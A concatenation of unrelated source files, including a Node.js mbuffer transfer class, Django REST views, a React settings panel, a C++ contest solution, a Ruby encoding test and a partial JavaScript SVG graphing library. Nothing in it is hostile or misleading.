this.callbackDone = true;
if ( this.err ){
//we hit an error somewhere, pass it back
callback(this.err);
}else{
//we're in some odd state
callback(new Error('Unknown error condition - refer to logs. Local close code:', this.localCloseCode, ' Remote close code:', this.remoteCloseCode));
}
}
}else{
}
return false;
}
Mbuffer.prototype.extractStatus = function(statusText){
if ( statusText == null ){
return null;
}
if (( statusText.indexOf('in @') != -1 ) && ( statusText.indexOf('out @') != -1)){
var parts = statusText.split(',').map(function(element){
return element.trim();
});
var status = {};
for ( var i = 0; i < parts.length; i++ ){
var part = parts[i];
var partSections = part.split(' ').filter(function(element){
return element.length > 0;
});
if ( partSections[0] == 'in' ){
status.in = [partSections[2], partSections[3]].join(' ');
}else if ( partSections[0] == 'out' ){
status.out = [partSections[2], partSections[3]].join(' ');
}else if ( partSections[0] == 'buffer' ){
status.buffer = [partSections[1]].join(' ');
}else{
status.total = [partSections[0], partSections[1]].join(' ');
}
}
return status;
}
return null;
}
/*
execute will first use SSH to start the mbuffer/zfs on the remote side
it uses the verbose setting of 4 to get an indication of when mbuffer is
ready and if it encounters an issue listening
if the remote side is okay, it starts the local side
because we're using mbuffer in direct/network mode, it will tend to continue
executing rather than dying and watchdog timers don't work
so if either side exits for some reason, the other side is examined for rouge
mbuffer processes that are terminated via 'kill'. sending a signal to the
ssh or /bin/sh process is not enough to kill it. explicitly terminating
the mbuffer process allows the ssh or /bin/sh process to exit with an error
code
*/
Mbuffer.prototype.execute = function(callback){
this.log.info('Executing transfer');
var self = this;
var cb = callback;
//generate a port number for mbuffer
var portNumber = Math.floor(Math.random() * (60000 - 1025) + 1025);
self.remoteEnd = self.initiateRemote(self.transfer, portNumber);
self.remoteEnd.stderr.on('data', function (data) {
var str = data.toString();
var statusObj = self.extractStatus(str);
if ( statusObj != null ){
this.remoteStatus = statusObj;
self.log.info('Remote total currently ' + this.remoteStatus.total);
}
if ( data.toString().indexOf('Address already in use') != -1){
self.aborting = true;
self.err = new Error('Random port selection failed - picked one that was in use');
self.remoteEnd.kill('SIGINT');
return;
}
if ( data.toString().indexOf('listening on') != -1 ){
//start local
self.localEnd = self.initiateLocal(self.transfer, portNumber);
self.localEnd.stderr.on('data', function (data) {
var str = data.toString();
var statusObj = self.extractStatus(str);
if ( statusObj != null ){
this.localStatus = statusObj;
self.log.info('Local total currently ' + this.localStatus.total);
}
});
self.localEnd.on('close', function (code) {
self.localCloseCode = code;
self.log.trace('Local child process exited with code ' + code);
self.localEnd = null;
if (( code != null ) && ( code > 0 )){
//the local side has errored - clean up remote if its still around
self.aborting = true;
//mbuffer on the remote side will hang around if we just kill SSH
self.cleanupMbuffer(portNumber, true, function(err){
//remote side will die on its own
});
}
self.callbackIfDone(cb);
});
self.localEnd.on('error', function(err){
});
}
if ( data.toString().indexOf('cannot receive') != -1){
//abort
self.err = new Error(data.toString());
self.aborting = true;
self.remoteEnd.kill('SIGINT');
if ( self.localEnd != null ){
//instead of killing the child process that was created
//we need to go after the mBuffer process directly. killing the child
//process causes mBuffer to hang around and madly consume CPU. Even
//the watchdog timer can't kill it
self.cleanupMbuffer(portNumber, false, function(err){
//should all come crashing down at this point
});
}
return;
}
});
self.remoteEnd.on('close', function (code) {
self.remoteCloseCode = code;
self.remoteEnd = null;
self.log.trace('Remote child process exited with code ' + code);
self.callbackIfDone(cb);
});
}
module.exports = Mbuffer;
|
from rest_framework import viewsets
from userFit.serializers import UserSerializer
from userFit.models import UserProfile
from userFit.permissions import IsOwner
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import generics
from activity.authentification import QuietBasicAuthentication
class AuthView(APIView):
authentication_classes = (QuietBasicAuthentication,)
serializer_class = UserSerializer
def post(self, request, *args, **kwargs):
return Response(self.serializer_class(request.user).data)
class UserViewSet(viewsets.ModelViewSet):
permission_classes = (IsOwner,)
queryset = UserProfile.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class UserList(generics.ListCreateAPIView):
queryset = UserProfile.objects.all()
serializer_class = UserSerializer
class UserDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = UserProfile.objects.all()
serializer_class = UserSerializer
|
<filename>src/app/components/Settings/SettingsCritical.tsx<gh_stars>0
import React, {useState} from 'react';
import Typography from '@material-ui/core/Typography';
import Select from '@material-ui/core/Select';
import MenuItem from '@material-ui/core/MenuItem';
import InputLabel from '@material-ui/core/InputLabel';
import FormControl from '@material-ui/core/FormControl';
import SettingsCriticalExec from './SettingsCriticalExec';
import { showUserSaveFilesInFileManager } from '../../functions/files';
import {reset} from '../../functions/reset';
interface SettingsCriticalProps {
onClose: Function,
}
export default function SettingsCritical(props: SettingsCriticalProps) {
const [action, setAction] = useState("user");
const handleActionChange = (e: any) => {
setAction(e.target.value ?? "user");
}
const getVerificationText = () => {
switch (action) {
case "user":
return "access-private-program-files"
case "reset":
return "reset-everything"
default:
return "invalid-action"
}
}
const onActionExec = () => {
switch (action) {
case "user":
showUserSaveFilesInFileManager();
break;
case "reset":
reset();
break;
default:
break;
}
}
return (
<div
className="flex-col-center"
style={{
gap: "10px"
}}
>
<Typography>
Danger Zone
</Typography>
<p
style={{
padding: "0px",
margin: "0px"
}}
>
Be Careful: Irreversible Actions
</p>
<FormControl
style={{
minWidth: "200px"
}}
>
<InputLabel>Action</InputLabel>
<Select
value={action}
onChange={handleActionChange}
>
<MenuItem value={"user"}>Access User Files</MenuItem>
<MenuItem value={"reset"}>Reset</MenuItem>
</Select>
</FormControl>
<SettingsCriticalExec
verifyUserText={getVerificationText()}
onActionExec={onActionExec}
onClose={props.onClose}
/>
</div>
)
} |
public function getProducts($id = NULL){
$category = new CategoryModel();
$products = $category->findProductsByCategory($id);
if ($products) {
return $this->response->setJSON($products);
} else {
return $this->response->setStatusCode(404)->setJSON(['error' => 'No products found for the given category ID']);
}
} |
<filename>src/main/java/com/home/demo/util/UserInfo.java
package com.home.demo.util;
import java.util.Collection;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.security.core.userdetails.UserDetails;
public class UserInfo {
//获取用户名
public static String getPrincipal(){
String userName = null;
Object principal = SecurityContextHolder.getContext().getAuthentication().getPrincipal();
if (principal instanceof UserDetails) {
userName = ((UserDetails)principal).getUsername();
} else {
userName = principal.toString();
}
return userName;
}
//获取用户的权限
public static Collection<? extends GrantedAuthority> getAuthorities(){
Collection<? extends GrantedAuthority> authorities = null;
Object principal = SecurityContextHolder.getContext().getAuthentication().getPrincipal();
if (principal instanceof UserDetails) {
UserDetails userDetails = (UserDetails)principal;
authorities = userDetails.getAuthorities();
}
return authorities;
}
}
|
# Set up virtual environment
pipenv lock --clear
pipenv install
# Set up project directory
pipenv run python setup.py
# Get projects, publications, and citation data
pipenv run python nih_reporter_query.py --search_terms "search_terms.txt" --operator "or" --start_year 1985 --end_year 2021
# Extract features
pipenv run python feature_extraction.py --max_df 0.1 --max_features 1000
# Find k (uncomment if needed)
# pipenv run python find_k.py --trials 5 --max_k 120 --num_features 500
# Run analysis
pipenv run python analyze_clusters.py --k 50 --trials 1 |
<filename>acmicpc.net/source/1940.cpp
// 1940. 주몽
// 2020.07.03
// 수학
#include<iostream>
#include<vector>
using namespace std;
int main()
{
int n;
int m;
cin >> n >> m;
vector<int> v(n);
for (int i = 0; i < n; i++)
{
cin >> v[i];
}
int ans = 0;
for (int i = 0; i < n; i++)
{
if (v[i] == 0)
{
continue;
}
for (int j = i + 1; j < n; j++)
{
if (v[j] == 0)
{
continue;
}
if (v[i] + v[j] == m)
{
ans++;
v[i] = 0;
v[j] = 0;
break;
}
}
}
cout << ans << endl;
return 0;
}
|
<filename>test/uvlq64_test.rb
require "test_helper"
class UVLQ64Test < Minitest::Test
def test_uvlq64_can_encode_and_decode()
x = [
# we use big endian for all this due to uvlq64
0x7f,
0x4000,
0x0,
0x3ffffe,
0x1fffff,
0x200000,
0x3311a1234df31413
]
x.each do |v|
newBuf = Wexpr::UVLQ64::write(v)
refute_equal nil, newBuf
number, newBuf = Wexpr::UVLQ64::read(newBuf)
refute_equal nil, newBuf
assert_equal v, number
end
end
end
|
<reponame>prajwalsouza/viewX
viewX = {}
viewX.graphToSvgY = function (value, graphymin, graphymax) {
if (graphymin == graphymax) {
graphymin = graphymin - 1
graphymax = graphymax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
if (graphymin > graphymax) {
temp = graphymin
graphymin = graphymax
graphymax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
y = ((-80)/(graphymax - graphymin))*(value - graphymin) + 90
return y
}
viewX.graphToScaledY = function (value, graphymin, graphymax, aspectratio) {
if(aspectratio > 1) {
if (graphymin == graphymax) {
graphymin = graphymin - 1
graphymax = graphymax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
if (graphymin > graphymax) {
temp = graphymin
graphymin = graphymax
graphymax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
y = ((-80)/(graphymax - graphymin))*(value - graphymin) + 90
}
else {
if (graphymin == graphymax) {
graphymin = graphymin - 1
graphymax = graphymax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
if (graphymin > graphymax) {
temp = graphymin
graphymin = graphymax
graphymax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
aspectratio = 1/aspectratio
vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
y = ((vl - vh)/(graphymax - graphymin))*(value - graphymin) + vh
// console.log(x)
// console.log(v1, v2)
// y = (((v2 - v1)/(100))*(y)) + v1
}
return y
}
viewX.svgToGraphY = function (percentvalue, graphymin, graphymax, aspectratio) {
if(aspectratio > 1) {
if (graphymin == graphymax) {
graphymin = graphymin - 1
graphymax = graphymax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
if (graphymin > graphymax) {
temp = graphymin
graphymin = graphymax
graphymax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
y = ((percentvalue - 90)*(graphymax - graphymin)/((-1)*80)) + graphymin
}
else {
if (graphymin == graphymax) {
graphymin = graphymin - 1
graphymax = graphymax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
if (graphymin > graphymax) {
temp = graphymin
graphymin = graphymax
graphymax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphymax + ' and Min value : ' + graphymin)
}
aspectratio = 1/aspectratio
vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
// y = ((vl - vh)/(graphymax - graphymin))*(value - graphymin) + vh
y = (((percentvalue - vh)*(graphymax - graphymin))/(vl - vh)) + graphymin
// console.log(x)
// console.log(v1, v2)
// y = (((v2 - v1)/(100))*(y)) + v1
}
return y
}
viewX.graphToSvgX = function (value, graphxmin, graphxmax) {
if (graphxmin == graphxmax) {
graphxmin = graphxmin - 1
graphxmax = graphxmax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
if (graphxmin > graphxmax) {
temp = graphxmin
graphxmin = graphxmax
graphxmax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
x = ((80)/(graphxmax - graphxmin))*(value - graphxmin) + 10
return x
}
viewX.graphToScaledX = function(value, graphxmin, graphxmax, aspectratio) {
if (aspectratio <= 1) {
if (graphxmin == graphxmax) {
graphxmin = graphxmin - 1
graphxmax = graphxmax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
if (graphxmin > graphxmax) {
temp = graphxmin
graphxmin = graphxmax
graphxmax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
x = ((80)/(graphxmax - graphxmin))*(value - graphxmin) + 10
}
else {
if (graphxmin == graphxmax) {
graphxmin = graphxmin - 1
graphxmax = graphxmax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
if (graphxmin > graphxmax) {
temp = graphxmin
graphxmin = graphxmax
graphxmax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
x = ((vh - vl)/(graphxmax - graphxmin))*(value - graphxmin) + vl
// console.log(x)
// console.log(v1, v2)
// y - y1 = (y2 - y1)/(x2 - x1) * (x - x1)
// x = (((v2 - v1)/(90))*(x - 10)) + v1
// console.log(x)
// console.log('_')
}
return x
}
viewX.svgToGraphX = function(percentvalue, graphxmin, graphxmax, aspectratio) {
if (aspectratio <= 1) {
if (graphxmin == graphxmax) {
graphxmin = graphxmin - 1
graphxmax = graphxmax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
if (graphxmin > graphxmax) {
temp = graphxmin
graphxmin = graphxmax
graphxmax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
x = ((percentvalue - 10)*(graphxmax - graphxmin)/80) + graphxmin
}
else {
if (graphxmin == graphxmax) {
graphxmin = graphxmin - 1
graphxmax = graphxmax + 1
console.log('Conversion error, maximum value is equal to minimum value. Max value was raised by 1 and Min value was reduced by 1. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
if (graphxmin > graphxmax) {
temp = graphxmin
graphxmin = graphxmax
graphxmax = temp
console.log('Conversion error, maximum value less than minimum value. Values were swapped. Max value : ' + graphxmax + ' and Min value : ' + graphxmin)
}
vl = (100*(1 - aspectratio)/2) + (10*aspectratio)
vh = (100*(aspectratio + 1)/2) - (10*aspectratio)
// x = ((vh - vl)/(graphxmax - graphxmin))*(value - graphxmin) + vl
x = ((percentvalue - vl)*(graphxmax - graphxmin)/(vh - vl)) + graphxmin
// y - y1 = (y2 - y1)/(x2 - x1) * (x - x1)
// x = (((v2 - v1)/(90))*(x - 10)) + v1
}
return x
}
viewX.isInt = function(n){
return Number(n) === n && n % 1 === 0;
}
viewX.isFloat = function(n){
return Number(n) === n && n % 1 !== 0;
}
viewX.gridtickvalues = function(valmin, valmax, ticksexpected) {
expstring = ((valmax - valmin)/ticksexpected).toExponential()
majorgridorder = parseFloat(Math.pow(10 , expstring.slice(expstring.indexOf('e') + 1)))
if (expstring.indexOf('.') != -1) {
majorgriddivision = parseFloat(expstring.slice(0, expstring.indexOf('.'))*majorgridorder)
}
else {
majorgriddivision = parseFloat(expstring.slice(0, expstring.indexOf('e'))*majorgridorder)
}
integerchoices = [1,2,5,10]
for(choice = 0; choice < integerchoices.length - 1; choice++) {
if (majorgriddivision < integerchoices[choice + 1]*majorgridorder) {
majorgriddivisionchoice = majorgridorder*integerchoices[choice]
break
}
}
if(valmin > 0) {
majorgridstart = Math.ceil(valmin/majorgriddivisionchoice)*majorgriddivisionchoice;
majorgridstart = majorgridstart - majorgriddivisionchoice
}
else if(valmin < 0) {
majorgridstart = Math.floor(valmin/majorgriddivisionchoice)*majorgriddivisionchoice;
}
else{
majorgridstart = majorgriddivisionchoice;
}
// majorgridstart = majorgridstart - majorgriddivisionchoice
// console.log(majorgridstart, (valmax + majorgriddivisionchoice), majorgriddivisionchoice)
majortickvalues = []
for(majoraxispoint = majorgridstart; majoraxispoint < (valmax + majorgriddivisionchoice); majoraxispoint = majoraxispoint + majorgriddivisionchoice) {
majortickvalues.push(majoraxispoint)
}
return majortickvalues
}
viewX.updateGraphZoom = function(graphname, newMinMax) {
gdata = viewX.graphData[graphname]
svgElement = gdata.svgElement
if (newMinMax.xmin != 0) {
gdata.xmin = newMinMax.xmin || gdata.xmin
}
else {
gdata.xmin = 0
}
if (newMinMax.xmax != 0) {
gdata.xmax = newMinMax.xmax || gdata.xmax
}
else {
gdata.xmax = 0
}
if (newMinMax.ymin != 0) {
gdata.ymin = newMinMax.ymin || gdata.ymin
}
else {
gdata.ymin = 0
}
if (newMinMax.ymax != 0) {
gdata.ymax = newMinMax.ymax || gdata.ymax
}
else {
gdata.ymax = 0
}
aratio = gdata.aspectratio
if (gdata.unitAspectRatio == 'yes') {
if (gdata.fixAxis == 'yaxis') {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.xmax + gdata.xmin)/2
gdata.xmin = centre - ((gdata.ymax - gdata.ymin)*aratio/2)
gdata.xmax = centre + ((gdata.ymax - gdata.ymin)*aratio/2)
}
else {
gdata.xmax = gdata.xmin + (gdata.ymax - gdata.ymin)*aratio
}
}
else {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.ymax + gdata.ymin)/2
gdata.ymin = centre - ((gdata.xmax - gdata.xmin)*aratio/2)
gdata.ymax = centre + ((gdata.xmax - gdata.xmin)*aratio/2)
}
else {
gdata.ymax = gdata.ymin + (gdata.xmax - gdata.xmin)*aratio
}
}
}
if (gdata.yaxisvisibility == 'yes') {
var lineElement = gdata.yaxisElement
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.yaxiscolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
gdata.yaxisElement = lineElement
}
if (gdata.xaxisvisibility == 'yes') {
var lineElement = gdata.xaxisElement
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.xaxiscolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
gdata.xaxisElement = lineElement
}
viewX.deleteSegments(gdata.xmajorgridElements)
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlinesvisibility == 'yes') {
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
gdata.xmajorgridElements = []
for (m = 0; m < xmajortickvalues.length; m++) {
ticklocation = xmajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
ylength = (gdata.ymax - gdata.ymin)
if (gdata.xmajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin - (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax + (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
}
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.xmajorgridcolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
lineElement.style.strokeWidth = gdata.xmajorgridthickness + '%';
gdata.xmajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.xmajorgridticks = xmajortickvalues
}
viewX.deleteSegments(gdata.ymajorgridElements)
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlinesvisibility == 'yes') {
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
gdata.ymajorgridElements = []
for (m = 0; m < ymajortickvalues.length; m++) {
ticklocation = ymajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
xlength = (gdata.xmax - gdata.xmin)
if (gdata.ymajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX((gdata.xmin) - xlength/2, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax + (xlength/2), gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
if (viewX.darkmode == false) {
lineElement.style.stroke = gdata.ymajorgridcolor
}
else {
lineElement.style.stroke = 'hsla(0, 0%, 100%, 1)'
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
lineElement.style.strokeWidth = gdata.ymajorgridthickness + '%';
gdata.ymajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.ymajorgridticks = ymajortickvalues
}
viewX.deleteSegments(gdata.ymajorlabelsElements)
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlabelvisibility == 'yes') {
gdata.ymajorlabelsElements = []
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
scale = gdata.ymax - gdata.ymin
expstring = scale.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
labelylocationX = gdata.axislocationX
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) < 0) {
labelylocationX = gdata.xmin
}
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) > 100) {
labelylocationX = gdata.xmax
}
for (m = gdata.ylabelexclusionsstart; m < ymajortickvalues.length - gdata.ylabelexclusionsend; m++) {
ticklocation = ymajortickvalues[m]
value = ticklocation
if (eval(gdata.ymajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
else {
textElement.innerHTML = ticklocation
}
}
else {
if (Math.abs(ticklocation) < 0.01 && order > 2) {
ticklocation = ticklocation.toExponential(order)
}
else {
ticklocation = ticklocation.toFixed(order + 1)
}
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
else {
textElement.innerHTML = ticklocation
}
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
textElement.setAttribute('x', viewX.graphToScaledX(labelylocationX, gdata.xmin, gdata.xmax, aratio) + 0.5 + gdata.ymajorgridlabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + 0.5 + '%');
textElement.setAttribute('id',gdata.name + '-yticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.userSelect = 'none'
// textElement.setAttribute('text-anchor', 'middle')
textElement.style.fill = gdata.ymajorgridlabelcolor
if (viewX.darkmode == false) {
textElement.style.fill = gdata.ymajorgridlabelcolor
}
else {
textElement.style.fill = 'hsla(0, 0%, 100%, 1)'
}
svgElement.appendChild(textElement);
gdata.ymajorlabelsElements.push(textElement)
}
}
}
viewX.deleteSegments(gdata.xmajorlabelsElements)
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlabelvisibility == 'yes') {
gdata.xmajorlabelsElements = []
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
scale = gdata.xmax - gdata.xmin
expstring = scale.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
labelxlocationY = gdata.axislocationY
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) < 0) {
labelxlocationY = gdata.ymax
}
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) > 100) {
labelxlocationY = gdata.ymin
}
for (m = gdata.xlabelexclusionsstart; m < xmajortickvalues.length - gdata.xlabelexclusionsend; m++) {
ticklocation = xmajortickvalues[m]
value = ticklocation
if (eval(gdata.xmajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
textElement.innerHTML = ticklocation
}
else {
if (Math.abs(ticklocation) < 0.01 && order > 2) {
ticklocation = ticklocation.toExponential(order)
}
else {
ticklocation = ticklocation.toFixed(order + 1)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
transformedXval = viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) - 1
textElement.setAttribute('x', transformedXval + '%');
transformedYval = viewX.graphToScaledY(labelxlocationY, gdata.ymin, gdata.ymax, aratio) + 2 + gdata.xmajorgridlabelshift
textElement.setAttribute('y', transformedYval + '%');
textElement.setAttribute('id',gdata.name + '-xticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.userSelect = 'none'
textElement.setAttribute('text-anchor', 'middle')
if (parseFloat(order) >= 2) {
textElement.setAttribute('transform', 'rotate(90, ' + transformedXval + ', ' + transformedYval + ')')
}
textElement.style.fontFamily = 'Source Sans Pro'
if (viewX.darkmode == false) {
textElement.style.fill = gdata.xmajorgridlabelcolor
}
else {
textElement.style.fill = 'hsla(0, 0%, 100%, 1)'
}
svgElement.appendChild(textElement);
gdata.xmajorlabelsElements.push(textElement)
}
}
}
if (gdata.xaxislabelvisibility == 'yes') {
var textElement = gdata.xaxislabelElement
textElement.setAttribute('x', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + gdata.xaxislabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + 1 + '%');
gdata.xaxislabelElement = textElement
}
if (gdata.yaxislabelvisibility == 'yes') {
var textElement = gdata.yaxislabelElement
textElement.setAttribute('x', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + 0 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) - gdata.yaxislabelshift + '%');
gdata.yaxislabelElement = textElement
}
for (var key in gdata.lineData) {
lineElement = gdata.lineData[key][0]
lineoptions = gdata.lineData[key][1]
lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.circleData) {
circleElement = gdata.circleData[key][0]
circleoptions = gdata.circleData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0,circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
